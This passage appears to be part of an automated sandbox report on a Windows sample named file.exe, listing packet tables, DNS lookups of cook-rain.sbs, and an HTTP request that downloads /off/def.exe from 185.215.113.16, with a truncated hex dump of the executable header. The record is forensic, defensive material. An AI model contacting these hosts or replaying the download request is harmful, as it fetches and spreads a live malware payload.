                                                                                                                                                                                                Nov 20, 2024 10:55:02.483041048 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.483074903 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.483308077 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.483711004 CET50080443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.483722925 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.483809948 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.483823061 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.690222979 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.702773094 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.702820063 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.705941916 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.705960035 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.723017931 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.726401091 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.726418972 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.728693962 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.728702068 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.804752111 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.804936886 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.805167913 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.805231094 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.805231094 CET50078443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.805264950 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.805293083 CET4435007813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.825051069 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.825263023 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.825346947 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.825371981 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.825401068 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:02.825412989 CET50079443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:02.825419903 CET4435007913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.136065960 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.136557102 CET50080443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.136581898 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.136996031 CET50080443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.137002945 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.148387909 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.148727894 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.148756027 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.149094105 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.149100065 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.243058920 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.243690014 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.243746042 CET50080443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.243792057 CET50080443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.243808985 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.243814945 CET50080443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.243819952 CET4435008013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.256453037 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.256599903 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.256661892 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.256694078 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.256711960 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:03.256721973 CET50081443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:55:03.256728888 CET4435008113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:12.525013924 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:12.525074959 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:12.525250912 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:12.525696993 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:12.525719881 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.316569090 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.316652060 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.318290949 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.318317890 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.318559885 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.325220108 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.371326923 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.591588974 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.591615915 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.591634035 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.591702938 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.591742039 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.591759920 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.591787100 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.597379923 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.597421885 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.597445011 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.597479105 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.597489119 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.597490072 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.599525928 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.618247986 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.618295908 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:13.618367910 CET50082443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:55:13.618381977 CET4435008220.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:47.940337896 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:47.940385103 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:47.940466881 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:47.940701008 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:47.940717936 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:48.708245039 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:48.708606958 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:48.708622932 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:48.709002972 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:48.709327936 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:48.709423065 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:48.751482010 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:58.520278931 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:58.520374060 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:58.520415068 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:58.596503019 CET50084443192.168.2.7142.250.185.228
                                                                                                                                                                                                Nov 20, 2024 10:55:58.596533060 CET44350084142.250.185.228192.168.2.7
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 20, 2024 10:54:16.405673981 CET123123192.168.2.720.101.57.9
                                                                                                                                                                                                Nov 20, 2024 10:54:16.575963974 CET12312320.101.57.9192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:19.954917908 CET6158253192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:19.994160891 CET53615821.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:44.198741913 CET53625781.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:44.219397068 CET53553711.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:45.489684105 CET53497471.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.877957106 CET5679753192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:47.878319025 CET6156753192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:47.888256073 CET53567971.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:47.888273001 CET53615671.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:48.095935106 CET5051053192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:48.096077919 CET5091753192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:49.555387974 CET4979353192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:49.555515051 CET6167653192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:52.421216011 CET53648001.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.621268988 CET5448353192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:54:53.621597052 CET4942653192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:55:02.244179010 CET53492111.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:10.665411949 CET138138192.168.2.7192.168.2.255
                                                                                                                                                                                                Nov 20, 2024 10:55:20.995630026 CET53518951.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:43.212622881 CET53576761.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:43.381792068 CET53628141.1.1.1192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:55:53.627511978 CET6141653192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:55:53.627847910 CET5799053192.168.2.71.1.1.1
                                                                                                                                                                                                Nov 20, 2024 10:56:11.212959051 CET53628931.1.1.1192.168.2.7
                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                Nov 20, 2024 10:54:49.592225075 CET192.168.2.71.1.1.1c2e6(Port unreachable)Destination Unreachable
                                                                                                                                                                                                Nov 20, 2024 10:54:55.891674995 CET192.168.2.71.1.1.1c267(Port unreachable)Destination Unreachable
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 20, 2024 10:54:19.954917908 CET192.168.2.71.1.1.10x9040Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:47.877957106 CET192.168.2.71.1.1.10x77bfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:47.878319025 CET192.168.2.71.1.1.10x6d62Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.095935106 CET192.168.2.71.1.1.10x8e3cStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.096077919 CET192.168.2.71.1.1.10x617Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.555387974 CET192.168.2.71.1.1.10xc1efStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.555515051 CET192.168.2.71.1.1.10x571dStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:53.621268988 CET192.168.2.71.1.1.10x3555Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:53.621597052 CET192.168.2.71.1.1.10x90f4Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:55:53.627511978 CET192.168.2.71.1.1.10x3ff8Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:55:53.627847910 CET192.168.2.71.1.1.10xc0ffStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 20, 2024 10:54:19.994160891 CET1.1.1.1192.168.2.70x9040No error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:19.994160891 CET1.1.1.1192.168.2.70x9040No error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:47.888256073 CET1.1.1.1192.168.2.70x77bfNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:47.888273001 CET1.1.1.1192.168.2.70x6d62No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.105432034 CET1.1.1.1192.168.2.70x86c0No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.105432034 CET1.1.1.1192.168.2.70x86c0No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.105432034 CET1.1.1.1192.168.2.70x86c0No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.105921984 CET1.1.1.1192.168.2.70x9cdaNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106339931 CET1.1.1.1192.168.2.70x8e3cNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106339931 CET1.1.1.1192.168.2.70x8e3cNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106339931 CET1.1.1.1192.168.2.70x8e3cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106339931 CET1.1.1.1192.168.2.70x8e3cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106828928 CET1.1.1.1192.168.2.70x617No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:48.106828928 CET1.1.1.1192.168.2.70x617No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.565913916 CET1.1.1.1192.168.2.70x33cbNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.566209078 CET1.1.1.1192.168.2.70xc1efNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.566209078 CET1.1.1.1192.168.2.70xc1efNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.566209078 CET1.1.1.1192.168.2.70xc1efNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.566209078 CET1.1.1.1192.168.2.70xc1efNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.566962957 CET1.1.1.1192.168.2.70x571dNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.566962957 CET1.1.1.1192.168.2.70x571dNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567092896 CET1.1.1.1192.168.2.70x692bNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567092896 CET1.1.1.1192.168.2.70x692bNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:49.567092896 CET1.1.1.1192.168.2.70x692bNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:53.628809929 CET1.1.1.1192.168.2.70x90f4No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:53.629890919 CET1.1.1.1192.168.2.70x3555No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:55.878005981 CET1.1.1.1192.168.2.70xf070No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:55.891586065 CET1.1.1.1192.168.2.70x2732No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:59.198442936 CET1.1.1.1192.168.2.70x48ddNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:54:59.209947109 CET1.1.1.1192.168.2.70xafefNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:55:53.789062023 CET1.1.1.1192.168.2.70x3ff8No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 20, 2024 10:55:53.789084911 CET1.1.1.1192.168.2.70xc0ffNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                • otelrules.azureedge.net
                                                                                                                                                                                                • cook-rain.sbs
                                                                                                                                                                                                • slscr.update.microsoft.com
                                                                                                                                                                                                • https:
                                                                                                                                                                                                  • js.monitor.azure.com
                                                                                                                                                                                                  • wcpstatic.microsoft.com
                                                                                                                                                                                                • fs.microsoft.com
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.749812185.215.113.16807724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 20, 2024 10:54:33.157574892 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:33.875395060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Content-Length: 2741248
                                                                                                                                                                                                Last-Modified: Wed, 20 Nov 2024 09:40:15 GMT
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                ETag: "673dae7f-29d400"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@* `@ **`Ui` @ @.rsrc`2@.idata 8@yggyennp)r):@ceftresi *)@.taggant@@*")@
                                                                                                                                                                                                Nov 20, 2024 10:54:33.875411034 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.876215935 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.876230955 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.876249075 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.876801968 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.876816034 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.876830101 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.876844883 CET24INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 20, 2024 10:54:33.877722979 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
